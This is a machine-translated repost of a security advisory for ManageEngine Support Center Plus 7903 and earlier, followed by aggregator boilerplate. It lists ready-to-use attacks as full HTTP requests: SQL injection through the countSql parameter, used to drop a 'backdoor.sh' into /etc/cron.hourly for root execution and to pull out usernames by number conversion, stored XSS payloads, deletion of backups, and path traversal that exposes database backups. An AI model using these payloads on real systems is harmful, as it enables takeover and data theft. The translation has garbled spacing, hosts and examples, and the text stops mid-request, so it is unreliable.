ManageEngine Support Center Plus version 7903 and multiple defects

Source: Internet
Author: User

Title: ManageEngine Support Center Plus <= 7903 Multiple Vulnerabilities
Author: Robert 'xistence 'van Hamburg www.2cto.com (xistence <[AT]> 0x90. nl
: Http://www.manageengine.com/products/support-center/64045241/ManageEngine_SupportCenter_Plus_7_9_0_SP-0_3_0.ppm
Web site: http://www.manageengine.com/products/support-center/
Affected Versions: 7903 and earlier
Test System version: CentOS 5 Linux (Windows version also vulnerable, although untested)
To fix version: 7905 to the latest = 7908
+ Region-+
 
 
+ Region-+
| 0x01-SQL Injection in Row Count
+ Region-+
 
Normally when you click on the row count the following POST request is executed:
 
POST/servlet/AJaxServlet? Action = getWorkOrderCount HTTP/1.1
Host: supportcenter: 8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv: 6.0.2) Gecko/20100101 Firefox/6.0.2
Accept: text/javascript, text/html, application/xml, text/xml ,*/*
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.7
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/x-www-form-urlencoded; charset = UTF-8
Referer: http: // www.2cto.com/WOListView. do? ViewName = All_Requester
Content-Length: 2062
Cookie: JSESSIONID = 8C712F3C4F909CB5ABE4B2E9E688C55D; 2 RequestsshowThreadedReq = showThreadedReqshow;
2 RequestshideThreadedReq = hideThreadedReqhide; JSESSIONIDSSO = 5E58C910F58B97EF3776124641E4C4CC; PREV_CONTEXT_PATH =/custom
Pragma: no-cache
Cache-Control: no-cache
 
CountSql = select % 20 count (*) % 20 from % 20 workorder % 20wo % 20 left % 20 join % 20workorder_fields % 20wof % 20on % 20wo. workorderid % 3Dwof. workorderid % 20 left % 20 join % 20workorder_product % 20on % 20wo. workorderid % 3Dworkorder_product.workorderid % 20 left % 20 join % 20 componentdefinition % 20on % 20workorder_product.product_id % 3Dcomponentdefinition. componentid % 20 inner % 20 join % 20 workorderstates % 20wos % 20on % 20wo. workorderid % 3Dwos. workorderid % 20 left % 20 join % 20 categorydefinition % 20cd % 20on % 20wos. categoryid % 3Dcd. categoryid % 20 left % 20 join % 20 subcategorydefinition % 20scd % 20on % 20wos. subcategoryid % 3Dscd. subcategoryid % 20 left % 20 join % 20 aaauser % 20aau % 20on % 20wo. requesterid % 3Daau. user_id % 20 left % 20 join % 20 aaauser % 20ti % 20on % 20wos. ownerid % 3Dti. user_id % 20 left % 20 join % 20 statusdefinition % 20std % 20on % 20wos. statusid % 3Dstd. statusid % 20 left % 20 join % 20 departmentdefinition % 20dpt % 20on % 20wo. deptid % 3Ddpt. deptid % 20 left % 20 join % 20workorder_account % 20 woacc % 20on % 20wo. workorderid % 3Dwoacc. workorderid % 20 left % 20 join % 20 aaausercontactinfo % 20user_contact % 20on % 20aau. user_id % 3Duser_contact.user_id % 20 left % 20 join % 20 aaacontactinfo % 20 rcontact % 20on % 20user_contact.contactinfo_id % 3Drcontact. contactinfo_id % 20 left % 20 join % 20 leveldefinition % 20lvd % 20on % 20wos. levelid % 3Dlvd. levelid % 20 left % 20 join % 20 prioritydefinition % 20pd % 20on % 20wos. priorityid % 3Dpd. priorityid % 20 left % 20 join % 20 modedefinition % 20mdd % 20on % 20wo. modeid % 3Dmdd. modeid % 20 left % 20 join % 20 aaausercontactinfo % 20auci1% 20on % 20aau. user_id % 3Dauci1. user_id % 20 left % 20 join % 20 aaacontactinfo % 20aci1% 20on % 20auci1. contactinfo_id % 3Daci1. contactinfo_id % 20 left % 20 join % 20workorder_queue % 20wo_queue % 20on % 20wo. workorderid % 3Dwo_queue.workorderid % 20 left % 20 join % 20 queuedefinition % 20 queue % 20on % 20wo_queue.queueid % 3Dqueue. queueid % 20 left % 20 join % 20 sduser % 20crd % 20on % 20wo. createdbyid % 3Dcrd. userid % 20 left % 20 join % 20 aaauser % 20cri % 20on % 20crd. userid % 3Dcri. user_id % 20 left % 20 join % 20 aaaorganization % 20org % 20on % 20woacc. accountid % 3Dorg.org _ id % 20 left % 20 join % 20 aaaorganization % 20 sorg % 20on % 20woacc. subaccountid % 3Dsorg.org _ id % 20 where % 20% 20 (aau. user_id % 20% 3D % 202) % 20and % 20 (wo. isparent % 20% 3D % 20 '1') % 20and % 20 (wo. departmentid % 20% 3D % 201 )))
 
File access as root:
As you see, you can put a normal MySQL query in the countSql parameter.
However, I found out there is some input and output validation in place. It's not possible to use a "CREATE", or "INSERT" query. SELECT however is possible.
This still makes it possible to use the following trick:
 
Add an attachment to a (new) ticket, like a "backdoor. sh" and press attach. but do not press "DONE "! Keep the window open. The file will be in a temporary directory now. (/ManageEngine/SupportCenter/bin/Attachments/Request/<YOURUSERID> /)
 
Now send a POST request:
 
CountSql = select load_file (".. /.. /bin/Attachments/Request/<YOURUSERID>/backdoor. sh ") into dumpfile"/etc/cron. hourly/backdoor. sh ";
 
Which creates the backdoor. sh file in/etc/cron. hourly.
 
Above is a blind SQL injection, as you won't see the results in your browser.
Extra note: "grant" is possible too, so you cocould add any user or change permissions.
 
 
IDS/Output validation bypass:
 
After some testing I found out it's only possible to get numeric responses back in the web browser. so you can't read usernames/md5 hashes directly from the database. however, it's still possible to bypass this "protection ":
 
We can send a query that retrieves the username of user_id = 2 from the aaauser table, convert it to hex (base 16) and then convert it to base 10:
CountSql = select conv (hex (first_name), 16,10) from aaauser where user_id = 2;
 
This will give the following result:
 
444351214452
 
Now in any local MySQL instance you can convert that back to hex (base 16) and unhex it:
 
Mysql> select unhex (conv ('000000', 10, 16 ));
+ ------------------------------------- +
| Unhex (conv ('000000', 10, 16) |
+ ------------------------------------- +
| Guest |
+ ------------------------------------- +
 
 
+ Region-+
| 0x02-storage xss for anonymous users
+ Region-+
 
XSS/Cross Site Scripting vulnerability as anonymous user:
Http://www.bkjia.com/sd/Request. sd
Vulnerable input fields are: Name, Message
Input: <script> alert ('Hello World') </script>
 
E-mail: my-email @ test' <script> alert ('Hello World') </script>
 
 
+ Region-+
| 0x03-Stored XSS vulnerabilities as ANY authenticated user-user details
+ Region-+
 
Possible by browsing to this url and fill in the form fields
Http: // support: 8080/RequesterDef. do? Mode = edit & id = 2 (id of the current user)
Vulnerable input fields are: Name, Twitter Screen Name, Job Title
 
Input: <script> alert ('Hello World') </script>
 
+ Region-+
| 0x04-Stored XSS vulnerabilities as ANY authenticated user-ticket
+ Region-+
 
Create a new request through the website with the http: // <SUPPORTCENTER>: 8080/WorkOrder. do url as any user. enter any subject and select Plain Text on the description. enter <script> alert ("Hello World") </script> in the description field. press "Add Request ".
 
Now when you browse the http://www.bkjia.com/WOListView. do and click on the ticket you just created you'll receive a popup which says "Hello World", which makes it possible to put stored javascript/html code inside the description.
 
POST a new request (below are the headers to exploit this)
POST/WorkOrder. do HTTP/1.1
Host: support: 8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv: 5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.7
Proxy-Connection: keep-alive
Referer: http: // support: 8080/WorkOrder. do
Cookie: JSESSIONID = 75291FED727C1BCA5CD2F5A46AA97071; PREV_CONTEXT_PATH =; JSESSIONIDSSO = BA4D299A5FCBAB586F462AED5A730D67
Content-Type: application/x-www-form-urlencoded
Content-Length: 322
 
PARAMETERS: reqTemplate = & prodId = 0 & priority = 2 & reqID = 2 & usertypename = Requester & reqName = guest & category = 1 & item = 0 & subCategory = 0 & title = Test & description = % 3Cbr + % 2F % 3E % 3 Cscript % 3 Ealert % 28% 27 Hello + World % 27% 29% 3C % 2 Fscript % 3E & MOD_IND = WorkOrder & FORMNAME = WorkOrderForm & attach = & attPath = & component = Request & attSize = & attachments = & autoCCList = & addWO = addWO
 
 
+ Region-+
| 0x05-Anonymous Users Delete support center patch backup
+ Region-+
 
Delete Support Center Plus Backups as ANY authenticated user
Change the ids = to delete other backups
Http: // support: 8080 logs/BackupSchedule. do? Module = delete_backup & backup_ids = <ID>
 
 
+ Region-+
| 0x06-Create a Backup schedule as ANY authenticated user and write the backup file to a public accessible directory
+ Region-+
 
Create a Backup schedule as ANY authenticated user and write backup file to a public access directory
Below are the headers to create a backup schedule on. After this has been done, it's possible to download
The Support Center Plus backup file at http: // support: 8080/inlineimages/backup_supportcenter_7901_fullbackup_08_24_2011_13_10.data
For this you only need to know the version of the support center and the date/time (which we set our selfs in the POST)
 
POST/BackupSchedule. do HTTP/1.1
Host: support: 8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv: 5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/javascript, text/html, application/xml, text/xml ,*/*
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.7
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/x-www-form-urlencoded; charset = UTF-8
Referer: http://www.bkjia.com/AdminHome. do
Cookie: JSESSIONID = 001cfc62780059cc1fc04ada6cf70000d; PREV_CONTEXT_PATH =; fromPortal = mermerportal; JSESSIONIDSSO = 57d961350a26a1d9c70afa6e000060e
DNT: 1
Pragma: no-cache
Cache-Control: no-cache
 
PARAMETERS module = save_schedule & days = 1 & backupStartDate = 2011-08-24 & hours = 13 & minutes = 10 & backupType = fullbackup & backupstatus = enabled & backupLocation = .. % 2 Finlineimages %

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.